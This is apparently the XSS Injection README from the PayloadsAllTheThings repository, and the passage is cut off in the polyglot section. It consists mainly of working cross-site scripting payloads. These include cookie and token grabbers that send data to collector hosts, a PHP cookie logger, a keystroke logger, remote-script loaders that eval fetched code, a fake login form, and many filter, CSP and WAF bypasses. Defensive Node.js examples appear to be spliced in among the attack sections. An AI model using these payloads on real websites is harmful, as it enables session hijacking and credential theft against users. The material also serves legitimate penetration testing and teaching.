PayloadsAllTheThings/XSS Injection/README.md

# Cross Site Scripting
> Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users.

## Summary

- [Cross Site Scripting](#cross-site-scripting)
  - [Vulnerability Details](#vulnerability-details)
  - [Exploit code or POC](#exploit-code-or-poc)
    - [Data grabber for XSS](#data-grabber-for-xss)
    - [CORS](#cors)
    - [UI redressing](#ui-redressing)
    - [Javascript keylogger](#javascript-keylogger)
    - [Other ways](#other-ways)
  - [Identify an XSS endpoint](#identify-an-xss-endpoint)
    - [Tools](#tools)
  - [XSS in HTML/Applications](#xss-in-htmlapplications)
    - [Common Payloads](#common-payloads)
    - [XSS using HTML5 tags](#xss-using-html5-tags)
    - [XSS using a remote JS](#xss-using-a-remote-js)
    - [XSS in hidden input](#xss-in-hidden-input)
    - [XSS when payload is reflected capitalized](#xss-when-payload-is-reflected-capitalized)
    - [DOM based XSS](#dom-based-xss)
    - [XSS in JS Context](#xss-in-js-context)
  - [XSS in wrappers javascript and data URI](#xss-in-wrappers-javascript-and-data-uri)
  - [XSS in files](#xss-in-files)
    - [XSS in XML](#xss-in-xml)
    - [XSS in SVG](#xss-in-svg)
    - [XSS in SVG (short)](#xss-in-svg-short)
    - [XSS in Markdown](#xss-in-markdown)
    - [XSS in SWF flash application](#xss-in-swf-flash-application)
    - [XSS in SWF flash application](#xss-in-swf-flash-application-1)
    - [XSS in CSS](#xss-in-css)
  - [XSS in PostMessage](#xss-in-postmessage)
  - [Blind XSS](#blind-xss)
    - [XSS Hunter](#xss-hunter)
    - [Other Blind XSS tools](#other-blind-xss-tools)
    - [Blind XSS endpoint](#blind-xss-endpoint)
    - [Tips](#tips)
  - [Mutated XSS](#mutated-xss)
  - [Polyglot XSS](#polyglot-xss)
  - [Filter Bypass and exotic payloads](#filter-bypass-and-exotic-payloads)
    - [Bypass case sensitive](#bypass-case-sensitive)
    - [Bypass tag blacklist](#bypass-tag-blacklist)
    - [Bypass word blacklist with code evaluation](#bypass-word-blacklist-with-code-evaluation)
    - [Bypass with incomplete html tag](#bypass-with-incomplete-html-tag)
    - [Bypass quotes for string](#bypass-quotes-for-string)
    - [Bypass quotes in script tag](#bypass-quotes-in-script-tag)
    - [Bypass quotes in mousedown event](#bypass-quotes-in-mousedown-event)
    - [Bypass dot filter](#bypass-dot-filter)
    - [Bypass parenthesis for string](#bypass-parenthesis-for-string)
    - [Bypass parenthesis and semi colon](#bypass-parenthesis-and-semi-colon)
    - [Bypass onxxxx= blacklist](#bypass-onxxxx-blacklist)
    - [Bypass space filter](#bypass-space-filter)
    - [Bypass email filter](#bypass-email-filter)
    - [Bypass document blacklist](#bypass-document-blacklist)
    - [Bypass document.cookie blacklist](#bypass-document-cookie-blacklist)
    - [Bypass using javascript inside a string](#bypass-using-javascript-inside-a-string)
    - [Bypass using an alternate way to redirect](#bypass-using-an-alternate-way-to-redirect)
    - [Bypass using an alternate way to execute an alert](#bypass-using-an-alternate-way-to-execute-an-alert)
    - [Bypass ">" using nothing](#bypass--using-nothing)
    - [Bypass "<" and ">" using and ](#bypass--and--using--and-)
    - [Bypass ";" using another character](#bypass--using-another-character)
    - [Bypass using HTML encoding](#bypass-using-html-encoding)
    - [Bypass using Katakana](#bypass-using-katakana)
    - [Bypass using Cuneiform](#bypass-using-cuneiform)
    - [Bypass using Lontara](#bypass-using-lontara)
    - [Bypass using ECMAScript6](#bypass-using-ecmascript6)
    - [Bypass using Octal encoding](#bypass-using-octal-encoding)
    - [Bypass using Unicode](#bypass-using-unicode)
    - [Bypass using UTF-7](#bypass-using-utf-7)
    - [Bypass using UTF-8](#bypass-using-utf-8)
    - [Bypass using UTF-16be](#bypass-using-utf-16be)
    - [Bypass using UTF-32](#bypass-using-utf-32)
    - [Bypass using BOM](#bypass-using-bom)
    - [Bypass using weird encoding or native interpretation](#bypass-using-weird-encoding-or-native-interpretation)
    - [Bypass using jsfuck](#bypass-using-jsfuck)
  - [CSP Bypass](#csp-bypass)
    - [Bypass CSP using JSONP](#bypass-csp-using-jsonp)
    - [Bypass CSP default-src](#bypass-csp-default-src)
    - [Bypass CSP inline eval](#bypass-csp-inline-eval)
    - [Bypass CSP unsafe-inline](#bypass-csp-unsafe-inline)
    - [Bypass CSP script-src self](#bypass-csp-script-src-self)
    - [Bypass CSP script-src data](#bypass-csp-script-src-data)
  - [Common WAF Bypass](#common-waf-bypass)
    - [Cloudflare XSS Bypasses by @Bohdan Korzhynskyi](#cloudflare-xss-bypasses-by-bohdan-korzhynskyi)
      - [25st January 2021](#25st-january-2021)
      - [21st April 2020](#21st-april-2020)
      - [22nd August 2019](#22nd-august-2019)
      - [5th June 2019](#5th-june-2019)
      - [3rd June 2019](#3rd-june-2019)
    - [Cloudflare XSS Bypass - 22nd March 2019 (by @RakeshMane10)](#cloudflare-xss-bypass---22nd-march-2019-by-rakeshmane10)
    - [Cloudflare XSS Bypass - 27th February 2018](#cloudflare-xss-bypass---27th-february-2018)
    - [Chrome Auditor - 9th August 2018](#chrome-auditor---9th-august-2018)
    - [Incapsula WAF Bypass by @Alra3ees- 8th March 2018](#incapsula-waf-bypass-by-alra3ees--8th-march-2018)
    - [Incapsula WAF Bypass by @c0d3G33k - 11th September 2018](#incapsula-waf-bypass-by-c0d3g33k---11th-september-2018)
    - [Incapsula WAF Bypass by @daveysec - 11th May 2019](#incapsula-waf-bypass-by-daveysec---11th-may-2019)
    - [Akamai WAF Bypass by @zseano - 18th June 2018](#akamai-waf-bypass-by-zseano---18th-june-2018)
    - [Akamai WAF Bypass by @s0md3v - 28th October 2018](#akamai-waf-bypass-by-s0md3v---28th-october-2018)
    - [WordFence WAF Bypass by @brutelogic - 12th September 2018](#wordfence-waf-bypass-by-brutelogic---12th-september-2018)
    - [Fortiweb WAF Bypass by @rezaduty - 9th July 2019](#fortiweb-waf-bypass-by-rezaduty---9th-july-2019)
  - [References](#references)

## Vulnerability Details
Cross-Site Scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS allows attackers to inject malicious code into a website, which is then executed in the browser of anyone who visits the site. This can allow attackers to steal sensitive information, such as user login credentials, or to perform other malicious actions.
There are 3 main types of XSS attacks:
* **Reflected XSS**: In a reflected XSS attack, the malicious code is embedded in a link that is sent to the victim. When the victim clicks on the link, the code is executed in their browser. For example, an attacker could create a link that contains malicious JavaScript, and send it to the victim in an email. When the victim clicks on the link, the JavaScript code is executed in their browser, allowing the attacker to perform various actions, such as stealing their login credentials.
* **Stored XSS**: In a stored XSS attack, the malicious code is stored on the server, and is executed every time the vulnerable page is accessed. For example, an attacker could inject malicious code into a comment on a blog post. When other users view the blog post, the malicious code is executed in their browsers, allowing the attacker to perform various actions.
* **DOM-based XSS**: a type of XSS attack that occurs when a vulnerable web application modifies the DOM (Document Object Model) in the user's browser. This can happen, for example, when user input is used to update the page's HTML or JavaScript in some way. In a DOM-based XSS attack, the malicious code is not sent to the server but is executed directly in the user's browser. This makes these attacks harder to detect and prevent, because the server has no record of the malicious code.
To prevent XSS attacks, it is important to properly validate and sanitize user input. This means ensuring that all input meets the necessary criteria, and removing any potentially dangerous characters or code. It is also important to escape special characters in user input before rendering it in the browser, to prevent the browser from interpreting it as code.
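The paragraph above names escaping as the fix but not which escape belongs where. The Node.js module below is an added example (not code from PayloadsAllTheThings): it encodes one user value for an HTML text node, an HTML attribute and a JavaScript string literal, then verifies that reflected payloads quoted later on this page no longer appear as raw markup. The search-page template and the `reflectsUnencoded` check are assumptions made for the example.

```javascript
// Added example (not from the original page): context-aware output encoding.
// The search page below is a constructed example, not a real application.

// HTML text and quoted-attribute context: turn the markup characters (plus the
// backtick, which some older parsers treated as an attribute delimiter) into
// character references so the browser never sees a tag or attribute boundary.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '`': '&#x60;' };
function escapeHtml(value) {
  return String(value).replace(/[&<>"'`]/g, (c) => HTML_ESCAPES[c]);
}

// JavaScript string context: JSON.stringify handles quotes and backslashes but
// leaves '<' and '>' alone, so a value containing "</script>" would still close
// the inline script block. \u003c / \u003e stay valid inside a JS string literal
// and are invisible to the HTML parser.
function toJsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026');
}

// Renders one user-controlled value into three different contexts of the same page.
function renderSearchPage(query) {
  return [
    '<!DOCTYPE html><html><body>',
    `<p>Results for: ${escapeHtml(query)}</p>`,
    `<input type="text" name="q" value="${escapeHtml(query)}">`,
    `<script>var lastQuery = ${toJsStringLiteral(query)};</script>`,
    '</body></html>',
  ].join('\n');
}

// Regression check for a test suite: the canary sent in the request must not
// come back as raw markup anywhere in the response body.
function reflectsUnencoded(html, canary) {
  return html.includes(canary);
}

// Reflected payloads quoted from the "Common Payloads" section of this page.
const SAMPLE_PAYLOADS = [
  `"><script>alert('XSS')</script>`,
  `</script><script>alert(1)</script>`,
  `<img src=x onerror=alert('XSS');>`,
];

// True when none of the sample payloads survives rendering as raw markup.
function allPayloadsNeutralised() {
  return SAMPLE_PAYLOADS.every((p) => !reflectsUnencoded(renderSearchPage(p), p));
}
```

Note the split: `escapeHtml` is enough for text and quoted attributes, but a value dropped into an inline script needs the JS-literal encoding, since `</script>` inside a string is still seen by the HTML parser first.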
## Exploit code or POC
### Data grabber for XSS
To obtain the administrator's cookie or a sensitive access token, the following payloads send it to a controlled page.

```html
<script>document.location='http://localhost/XSS/grabber.php?c='+document.cookie</script>
<script>document.location='http://localhost/XSS/grabber.php?c='+localStorage.getItem('access_token')</script>

<script>new Image().src="http://localhost/cookie.php?c="+document.cookie;</script>
<script>new Image().src="http://localhost/cookie.php?c="+localStorage.getItem('access_token');</script>
```
Write the collected data into a file.
```php
<?php
// Append each received value to a local file, one line per request.
$cookie = $_GET['c'];
$fp = fopen('cookies.txt', 'a+');
fwrite($fp, 'Cookie:' .$cookie."\r\n");
fclose($fp);
?>
```
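The grabber payloads above only work when the session cookie is readable from `document.cookie`, which the `HttpOnly` attribute prevents (a token kept in `localStorage` has no equivalent protection). The Node.js snippet below is an added example, not part of PayloadsAllTheThings: it parses `Set-Cookie` headers and reports session cookies that lack the attributes. The header lines are constructed samples and the "sensitive name" pattern is an assumption.

```javascript
// Added example: audit Set-Cookie headers for the attributes that keep a session
// cookie out of document.cookie (HttpOnly) and off plain HTTP (Secure).
// Constructed sample headers, not captured from a real server.
const SAMPLE_HEADERS = [
  'Set-Cookie: PHPSESSID=abc123; Path=/; HttpOnly; Secure; SameSite=Lax',
  'Set-Cookie: admin_token=xyz789; Path=/admin',
  'Set-Cookie: theme=dark; Path=/; Max-Age=31536000',
];

// Parse one Set-Cookie header line into its name and the attributes we care about.
function parseSetCookie(line) {
  const value = line.replace(/^Set-Cookie:\s*/i, '');
  const [pair, ...attrs] = value.split(';').map((s) => s.trim());
  const name = pair.slice(0, pair.indexOf('='));
  const flags = {};
  for (const attr of attrs) {
    const eq = attr.indexOf('=');
    const key = (eq === -1 ? attr : attr.slice(0, eq)).toLowerCase();
    flags[key] = eq === -1 ? true : attr.slice(eq + 1);
  }
  return {
    name,
    httpOnly: flags.httponly === true,
    secure: flags.secure === true,
    sameSite: typeof flags.samesite === 'string' ? flags.samesite : null,
  };
}

// Report findings for every cookie whose name looks like a session or token.
// (Assumed naming pattern; adjust it to the application's real cookie names.)
function auditCookies(lines, sensitiveNames = /sess|token|auth/i) {
  return lines
    .map(parseSetCookie)
    .filter((c) => sensitiveNames.test(c.name))
    .map((c) => ({
      name: c.name,
      findings: [
        ...(c.httpOnly ? [] : ['missing HttpOnly: readable through document.cookie, so the grabber payloads above would work']),
        ...(c.secure ? [] : ['missing Secure: sent over plain HTTP']),
        ...(c.sameSite ? [] : ['missing SameSite: attached to cross-site requests']),
      ],
    }));
}
```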
### CORS
```html
<script>
fetch('https://<SESSION>.burpcollaborator.net', {
method: 'POST',
mode: 'no-cors',
body: document.cookie
});
</script>
```
### UI redressing
Leverage the XSS to modify the HTML content of the page in order to display a fake login form.
```html
<script>
history.replaceState(null, null, '../../../login');
document.body.innerHTML = "<br><br><br><br><br><h1>Please login to continue</h1><form>Username: <input type='text'>Password: <input type='password'></form><input value='submit' type='submit'>"
</script>
```
### Javascript keylogger
Another way to collect sensitive data is to set a javascript keylogger.
```html
<img src=x onerror='document.onkeypress=function(e){fetch("http://domain.com?k="+String.fromCharCode(e.which))},this.remove();'>
```
### Other ways
More exploits at [http://www.xss-payloads.com/payloads-list.html?a#category=all](http://www.xss-payloads.com/payloads-list.html?a#category=all):
- [Taking screenshots using XSS and the HTML5 Canvas](https://www.idontplaydarts.com/2012/04/taking-screenshots-using-xss-and-the-html5-canvas/)
- [JavaScript Port Scanner](http://www.gnucitizen.org/blog/javascript-port-scanner/)
- [Network Scanner](http://www.xss-payloads.com/payloads/scripts/websocketsnetworkscan.js.html)
- [.NET Shell execution](http://www.xss-payloads.com/payloads/scripts/dotnetexec.js.html)
- [Redirect Form](http://www.xss-payloads.com/payloads/scripts/redirectform.js.html)
- [Play Music](http://www.xss-payloads.com/payloads/scripts/playmusic.js.html)
## Identify an XSS endpoint
This payload opens the debugger in the developer console rather than triggering a popup alert box.
```html
<script>debugger;</script>
```

Modern applications with content hosting can use [sandbox domains][sandbox-domains]

> to safely host various types of user-generated content. Many of these sandboxes are specifically meant to isolate user-uploaded HTML, JavaScript, or Flash applets and make sure that they can't access any user data.

[sandbox-domains]:https://security.googleblog.com/2012/08/content-hosting-for-modern-web.html

For this reason, it's better to use `alert(document.domain)` or `alert(window.origin)` rather than `alert(1)` as default XSS payload in order to know in which scope the XSS is actually executing.
Better payload replacing `<script>alert(1)</script>`:
```html
<script>alert(document.domain.concat("\n").concat(window.origin))</script>
```
While `alert()` is nice for reflected XSS, it quickly becomes a burden for stored XSS because the popup must be closed on every execution, so `console.log()` can be used instead to write a message to the browser's developer console (no interaction required).
Example:
```html
<script>console.log("Test XSS from the search bar of page XYZ\n".concat(document.domain).concat("\n").concat(window.origin))</script>
```
References:
- [Google Bughunter University - XSS in sandbox domains](https://sites.google.com/site/bughunteruniversity/nonvuln/xss-in-sandbox-domain)
- [LiveOverflow Video - DO NOT USE alert(1) for XSS](https://www.youtube.com/watch?v=KHwVjzWei1c)
- [LiveOverflow blog post - DO NOT USE alert(1) for XSS](https://liveoverflow.com/do-not-use-alert-1-in-xss/)
### Tools
Most tools are also suitable for blind XSS attacks:
* [XSStrike](https://github.com/s0md3v/XSStrike): Very popular but unfortunately not very well maintained
* [xsser](https://github.com/epsylon/xsser): Utilizes a headless browser to detect XSS vulnerabilities
* [Dalfox](https://github.com/hahwul/dalfox): Extensive functionality and extremely fast thanks to the implementation in Go
* [XSpear](https://github.com/hahwul/XSpear): Similar to Dalfox but based on Ruby
* [domdig](https://github.com/fcavallarin/domdig): Headless Chrome XSS Tester
## XSS in HTML/Applications
### Common Payloads
```html
// Basic payload
<script>alert('XSS')</script>
<scr<script>ipt>alert('XSS')</scr<script>ipt>
"><script>alert('XSS')</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
<script>\u0061lert('22')</script>
<script>eval('\x61lert(\'33\')')</script>
<script>eval(8680439..toString(30))(983801..toString(36))</script> //parseInt("confirm",30) == 8680439 && 8680439..toString(30) == "confirm"
<object/data="jav&#x61;sc&#x72;ipt&#x3a;al&#x65;rt&#x28;23&#x29;">

// Img payload
<img src=x onerror=alert('XSS');>
<img src=x onerror=alert('XSS')//
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=xss>
"><img src=x onerror=alert('XSS');>
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>
<><img src=1 onerror=alert(1)>

// Svg payload
<svg onload=alert(1)>
<svg/onload=alert('XSS')>
<svg onload=alert(1)//
<svg/onload=alert(String.fromCharCode(88,83,83))>
<svg id=alert(1) onload=eval(id)>
"><svg/onload=alert(String.fromCharCode(88,83,83))>
"><svg/onload=alert(/XSS/)
<svg><script href=data:,alert(1) />(`Firefox` is the only browser which allows self closing script)
<svg><script>alert('33')
<svg><script>alert&lpar;'33'&rpar;

// Div payload
<div onpointerover="alert(45)">MOVE HERE</div>
<div onpointerdown="alert(45)">MOVE HERE</div>
<div onpointerenter="alert(45)">MOVE HERE</div>
<div onpointerleave="alert(45)">MOVE HERE</div>
<div onpointermove="alert(45)">MOVE HERE</div>
<div onpointerout="alert(45)">MOVE HERE</div>
<div onpointerup="alert(45)">MOVE HERE</div>
```
### XSS using HTML5 tags
```html
<body onload=alert(/XSS/.source)>
<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
<video/poster/onerror=alert(1)>
<video><source onerror="javascript:alert(1)">
<video src=_ onloadstart="alert(1)">
<details/open/ontoggle="alert`1`">
<audio src onloadstart=alert(1)>
<marquee onstart=alert(1)>
<meter value=2 min=0 max=10 onmouseover=alert(1)>2 out of 10</meter>
<body ontouchstart=alert(1)> // Triggers when a finger touches the screen
<body ontouchend=alert(1)> // Triggers when a finger is removed from the touch screen
<body ontouchmove=alert(1)> // Triggers when a finger is dragged across the screen
```
### XSS using a remote JS
```html
<svg/onload='fetch("//host/a").then(r=>r.text().then(t=>eval(t)))'>
<script src=14.rs>
// you can also specify an arbitrary payload with 14.rs/#payload
e.g: 14.rs/#alert(document.domain)
```
### XSS in hidden input
```html
<input type="hidden" accesskey="X" onclick="alert(1)">
```

Use CTRL+SHIFT+X to trigger the onclick event.
### XSS when payload is reflected capitalized
```html
<IMG SRC=1 ONERROR=&#X61;&#X6C;&#X65;&#X72;&#X74;(1)>
```
### DOM based XSS
Based on a DOM XSS sink.
```html
#"><img src=/ onerror=alert(2)>
```
### XSS in JS Context
```javascript
-(confirm)(document.domain)//
; alert(1);//
// payload without quote/double quote, from @brutelogic (https://twitter.com/brutelogic)
```
## XSS in wrappers javascript and data URI
XSS with the `javascript:` wrapper:

```javascript
javascript:prompt(1)
%26%23106%26%2397%26%23118%26%2397%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2358%26%2399%26%23111%26%23110%26%23102%26%23105%26%23114%26%23109%26%2340%26%2349%26%2341
&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#99&#111&#110&#102&#105&#114&#109&#40&#49&#41
```

The "javascript:" prefix can be encoded in hex, Unicode or octal escapes:

```javascript
\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
\152\141\166\141\163\143\162\151\160\164\072alert(1)
```

A newline character can be inserted inside the scheme name:

```javascript
java%0ascript:alert(1) - LF (\n)
java%09script:alert(1) - Horizontal tab (\t)
java%0dscript:alert(1) - CR (\r)
```

Using the escape character:

```javascript
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
```

Using a newline and a comment `//`:

```javascript
javascript://%0Aalert(1)
javascript://anything%0D%0A%0D%0Awindow.alert(1)
```
XSS with the `data:` wrapper:

```javascript
data:text/html,<script>alert(0)</script>
data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+
<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>
```
XSS with `vbscript:` (Internet Explorer only):

```javascript
vbscript:msgbox("XSS")
```
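Every trick in this section works against a filter that looks for the literal string `javascript:` before the browser has decoded the value. The Node.js check below is an added example, not code from PayloadsAllTheThings: it decodes HTML character references the way the HTML parser does (semicolon optional, which is what the `&#106&#97...` form relies on), then lets the WHATWG URL parser strip the tab/newline tricks and allowlists the resulting scheme. The base URL `https://app.example/` and the allowed scheme list are assumptions; the check says nothing about the host.

```javascript
// Added example (not from PayloadsAllTheThings): server-side allowlist check for a
// user-supplied href/src value that survives the "javascript:" wrapper tricks above.
// The base URL https://app.example/ is an assumption.

// Named references that matter for URLs; numeric references are handled generically.
const NAMED_REFS = { amp: '&', lt: '<', gt: '>', quot: '"', apos: "'", colon: ':', Tab: '\t', NewLine: '\n' };

// Decode HTML character references the way the HTML parser does before the value
// reaches the URL parser. The terminating semicolon is optional on the browser's
// error-recovery path, which is exactly why the "&#106&#97..." payload above works.
function decodeHtmlEntities(s) {
  return s.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);?/gi, (match, body) => {
    if (body[0] === '#') {
      const hex = body[1] === 'x' || body[1] === 'X';
      const cp = hex ? parseInt(body.slice(2), 16) : parseInt(body.slice(1), 10);
      return Number.isFinite(cp) && cp > 0 && cp <= 0x10ffff ? String.fromCodePoint(cp) : match;
    }
    return Object.prototype.hasOwnProperty.call(NAMED_REFS, body) ? NAMED_REFS[body] : match;
  });
}

const ALLOWED_PROTOCOLS = new Set(['http:', 'https:', 'mailto:']);

// True only if the value, interpreted as a browser would, resolves to an allowed scheme.
// The WHATWG URL parser trims leading/trailing whitespace and removes every ASCII tab
// and newline, so "java%0ascript:" and " javascript:" both come back as "javascript:".
// Scheme check only: a relative path or an https URL to another host still passes.
function isSafeUrl(rawValue, base = 'https://app.example/') {
  let url;
  try {
    url = new URL(decodeHtmlEntities(rawValue), base);
  } catch {
    return false; // unparsable input is rejected, never passed through
  }
  return ALLOWED_PROTOCOLS.has(url.protocol);
}
```

The `%26%23106...` form on the page is the same entity payload percent-encoded once for transport; run this check on the value after the application's own URL decoding, i.e. at the point where it is about to be written into an attribute.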
## XSS in files
**NOTE:** The XML CDATA section is used here so that the JavaScript payload will not be treated as XML markup.

```xml
<name>
<value><![CDATA[<script>confirm(document.domain)</script>]]></value>
</name>
```
### XSS in XML
```xml
<html>
<head></head>
<body>
  <something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
</body>
</html>
```
### XSS in SVG
```xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert(document.domain);
  </script>
</svg>
```
### XSS in SVG (short)
```html
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
<svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg>
<svg><foreignObject><![CDATA[</foreignObject><script>alert(2)</script>]]></svg>
<svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>
```
### XSS in Markdown
```markdown
[a](javascript:prompt(document.cookie))
[a](j a v a s c r i p t:prompt(document.cookie))
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[a](javascript:window.onerror=alert;throw%201)
```
### XSS in SWF flash application
```
Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain);
IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(?js=history.go(-1),_self);}
IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(invalidfileinvalidfileinvalidfile,target);setTimeout(alert(w.document.location);w.close();,1);
```

More payloads in `./files`.

### XSS in SWF flash application
```
flashmediaelement.swf?jsinitfunctio%gn=alert`1`
flashmediaelement.swf?jsinitfunctio%25gn=alert(1)
ZeroClipboard.swf?id=\"))} catch(e) {alert(1);}//&width=1000&height=1000
swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert(1);//
swfupload.swf?buttonText=test<a href="javascript:confirm(1)"><img src="https://web.archive.org/web/20130730223443im_/http://appsec.ws/ExploitDB/cMon.jpg"/></a>&.swf
plupload.flash.swf?%#target%g=alert&uid%g=XSS&
moxieplayer.swf?url=https://github.com/phwd/poc/blob/master/vid.flv?raw=true
video-js.swf?readyFunction=alert(1)
player.swf?playerready=alert(document.cookie)
player.swf?tracecall=alert(document.cookie)
banner.swf?clickTAG=javascript:alert(1);//
io.swf?yid=\"));}catch(e){alert(1);}//
video-js.swf?readyFunction=alert%28document.domain%2b'%20XSSed!'%29
bookContent.swf?currentHTMLURL=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4
flashcanvas.swf?id=test\"));}catch(e){alert(document.domain)}//
phpmyadmin/js/canvg/flashcanvas.swf?id=test\"));}catch(e){alert(document.domain)}//
```
### XSS in CSS
```html
<!DOCTYPE html>
<html>
<head>
  <style>
    div {
      background-image: url("data:image/jpg;base64,<\/style><svg/onload=alert(document.domain)>");
      background-color: #cccccc;
    }
  </style>
</head>
<body>
  <div>lol</div>
</body>
</html>
```
## XSS in PostMessage
> If the target origin is the asterisk `*`, the message can be sent to any domain that has a reference to the child page.

```html
<html>
<body>
<input type=button value="Click Me" id="btn">
</body>
<script>
document.getElementById('btn').onclick = function(e){
window.poc = window.open('http://www.redacted.com/#login');
setTimeout(function(){
window.poc.postMessage(
{
"sender": "accounts",
"url": "javascript:confirm('XSS')",
},
'*'
);
}, 2000);
}
</script>
</html>
```
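The PoC above succeeds when the receiving page trusts the `sender` field in the message and assigns `url` to a navigation sink. The Node.js snippet below is an added example, not part of the page: it is the receiving-side handler written so the `javascript:confirm('XSS')` message is rejected, plus a sender wrapper that refuses the `*` target origin. The origins, the message shape, `navigate()` and the simulated events are assumptions.

```javascript
// Added example (not part of the page): receiving side of the postMessage exchange
// above, written so that the "url": "javascript:confirm('XSS')" message is rejected.
// The origins, the message shape and navigate() are assumptions.

const ALLOWED_ORIGINS = new Set(['https://accounts.example']);
const SITE_BASE = 'https://www.example/';

function makeMessageHandler(navigate, allowedOrigins = ALLOWED_ORIGINS, base = SITE_BASE) {
  return function onMessage(event) {
    // 1. event.origin is set by the browser and cannot be forged by the sender;
    //    the "sender" field inside the payload is just data and proves nothing.
    if (!allowedOrigins.has(event.origin)) return { accepted: false, reason: 'origin' };

    // 2. Validate the shape before touching any field.
    const data = event.data;
    if (!data || typeof data !== 'object' || typeof data.url !== 'string') {
      return { accepted: false, reason: 'shape' };
    }

    // 3. The URL is untrusted input: resolve it and allow only https pages on this site.
    //    new URL() strips tabs/newlines, so "java\nscript:" is caught as well.
    let target;
    try {
      target = new URL(data.url, base);
    } catch {
      return { accepted: false, reason: 'url' };
    }
    if (target.protocol !== 'https:' || target.origin !== new URL(base).origin) {
      return { accepted: false, reason: 'scheme-or-host' };
    }
    navigate(target.href);
    return { accepted: true, href: target.href };
  };
}

// Sender-side counterpart: refuse the "*" target origin the PoC above relies on,
// so the message cannot be delivered to a window that navigated elsewhere.
function postToChild(childWindow, message, targetOrigin) {
  if (targetOrigin === '*') throw new Error('postMessage target origin must be explicit');
  childWindow.postMessage(message, targetOrigin);
}

// Simulated events (constructed; in a browser they arrive via
// window.addEventListener('message', handler)).
const SAMPLE_EVENTS = [
  { origin: 'https://attacker.example', data: { sender: 'accounts', url: '/login' } },
  { origin: 'https://accounts.example', data: { sender: 'accounts', url: "javascript:confirm('XSS')" } },
  { origin: 'https://accounts.example', data: { sender: 'accounts', url: '/login' } },
];

// Runs the handler over the samples and records what it would have navigated to.
function runSamples() {
  const navigated = [];
  const handler = makeMessageHandler((href) => navigated.push(href));
  return { results: SAMPLE_EVENTS.map(handler), navigated };
}
```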
## Blind XSS
### XSS Hunter
> XSS Hunter allows you to find all kinds of cross-site scripting vulnerabilities, including the often-missed blind XSS. The service works by hosting specialized XSS probes which, upon firing, scan the page and send information about the vulnerable page to the XSS Hunter service.
XSS Hunter is deprecated, it was available at [https://xsshunter.com/app](https://xsshunter.com/app).
You can set up an alternative version:
* Self-hosted version from [mandatoryprogrammer/xsshunter-express](https://github.com/mandatoryprogrammer/xsshunter-express)
* Hosted on [xsshunter.trufflesecurity.com](https://xsshunter.trufflesecurity.com/)
```html
"><script src="https://js.rip/<custom.name>"></script>
"><script src=//<custom.subdomain>.xss.ht></script>
<script>$.getScript("//<custom.subdomain>.xss.ht")</script>
```
### Other Blind XSS tools
- [sleepy-puppy - Netflix](https://github.com/Netflix-Skunkworks/sleepy-puppy)
- [bXSS - LewisArdern](https://github.com/LewisArdern/bXSS)
- [ezXSS - ssl](https://github.com/ssl/ezXSS)
### Blind XSS endpoint

- Contact forms
- Ticket support
- Referer Header
- Custom Site Analytics
- Administrative Panel logs
- User Agent
- Comment Box
- Administrative Panel
### Tips
You can use a [Data grabber for XSS](#data-grabber-for-xss) and a one-line HTTP server to confirm the existence of a blind XSS before deploying a heavy blind-XSS testing tool.
Example payload:

```html
<script>document.location='http://10.10.14.30:8080/XSS/grabber.php?c='+document.domain</script>
```

Example one-line HTTP server:

```bash
$ ruby -run -ehttpd . -p8080
```
## Mutated XSS
Use browser quirks to recreate HTML tags when the payload is inserted through `element.innerHTML`.

Mutated XSS from Masato Kinugawa, used against the DOMPurify component on Google Search. Technical blog posts available at https://www.acunetix.com/blog/web-security-zone/mutation-xss-in-google-search/ and https://research.securitum.com/dompurify-bypass-using-mxss/.

```html
<noscript><p title="</noscript><img src=x onerror=alert(1)>">
```
## Polyglot XSS
Polyglot XSS - 0xsobky
```javascript
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
```
Polyglot XSS - Ashar Javed
```javascript
